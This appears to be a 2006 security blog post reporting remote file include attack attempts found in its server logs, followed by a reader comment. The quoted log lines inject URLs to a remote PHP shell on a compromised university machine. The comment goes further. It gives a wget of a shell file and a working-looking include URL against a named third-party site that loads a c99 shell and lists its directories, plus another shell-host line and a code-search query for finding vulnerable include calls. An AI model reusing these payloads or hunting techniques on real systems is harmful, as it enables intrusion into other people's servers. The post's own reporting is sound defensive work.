Stanford Hacked ha.ckers.org web application security lab

Stanford Hacked

I have been cataloging a few rootkits that people have been trying to get installed on the server via remote file includes. Well today I was checking the server logs and happened accross this little nugget. Apparently Stanford University had it’s 3D Lab hacked and is being used to launch botnet DDoS attacks:

66.7.194.155 - - [07/Oct/2006:15:57:46 -0700] “GET /blog/category/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://3dlab.stanford.edu/cmdi.txt??? HTTP/1.1″ 404 4873 “-” “libwww-perl/5.805″<br /> 193.223.240.55 - - [08/Oct/2006:14:29:21 -0700] “GET /blog/20060803/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://3dlab.stanford.edu/cmdi.txt???? HTTP/1.1″ 404 4873 “-” “libwww-perl/5.805″<br /> 193.223.240.55 - - [08/Oct/2006:14:32:53 -0700] “GET /blog/20060803/include/write.php?dir=http://3dlab.stanford.edu/cmdi.txt???? HTTP/1.1″ 404 4873 “-” “libwww-perl/5.805″<br /> 193.223.240.55 - - [08/Oct/2006:14:38:36 -0700] “GET /blog/20060803/include/write.php?dir=%20!scan%20!eval%20@gstring=’google%20dork’;http://3dlab.stanford.edu/cmdi.txt???? HTTP/1.1″ 404 4873 “-” “libwww-perl/5.805″

The Stanford machine that was hacked is being used as a launching pad for additional attacks using this php include rootkit in case anyone wants to mess with the IRC channel. Cute. Stanford has both a Security lab and a crypto lab and is the primary breeding ground for future Google employees. Hacked machines is pretty scary - and I’d be surprised if they had stopped at that machine alone rather than owning the entire network unless it simply is a botnet.

Here’s a photo of the hacked Stanford Univesity machine. Hopefully someone over there will fix it as I’m sure it’s being used as a huge launching pad for further attacks if it’s been up for over a day already and I’m the first person to notice. I had hoped the security folks at Stanford would be more on top of their network security to notice these types of things before I do as it could be used for almost anything nefarious.

So thumbs up to the graphics lab (cool stuff at that link) thumbs down for the security of it.

This entry was posted on Sunday, October 8th, 2006 at 6:27 pm and is filed under Webappsec. Responses are currently closed, but you can trackback from your own site.

One Response to “Stanford Hacked”

Tontonq Says:
October 10th, 2006 at 6:04 am
0700] “GET /blog/category/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://3dlab.stanford.edu/cmdi.txt???

haha they think your blog is based on php-nuke zuhahah

wget http://www.pikant.hu/images/v9.txt

hmm

http://www.pikant.hu/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://neuromancer.kayyo.com/c99.txt?&act=ls&d=/home/p/pikant/public_html/images&sort=0a

another remote file include zuhaha

i dont like anything any longer than stealing hackers private files

http://www.pikant.hu/images/cmd2.gif

another shell

$mhost = ‘http://www.sons-of-the-emperor.de/modules/coppermine/themes/default/cmd.txt?’;

hmm that site is down it has rfi bug too

i was have all of the morgan’s toolz than that http://ha.ckers.org/files/dos.txt but i like mine it workz with google dorkz and rfi bugz

how can a coder drop such easy bugs @ portal i dunno

http://www.google.com/codesearch?hl=en&lr=&q=%28include%7Crequire%29%28_once%29%3F%5C%28%5C%24_%28GET%7CPOST%7CREQUEST%7CCOOKIE%29&btnG=Search

using google ’s codersearch for into program flaws not hard

http://www.securityfocus.com/news/11417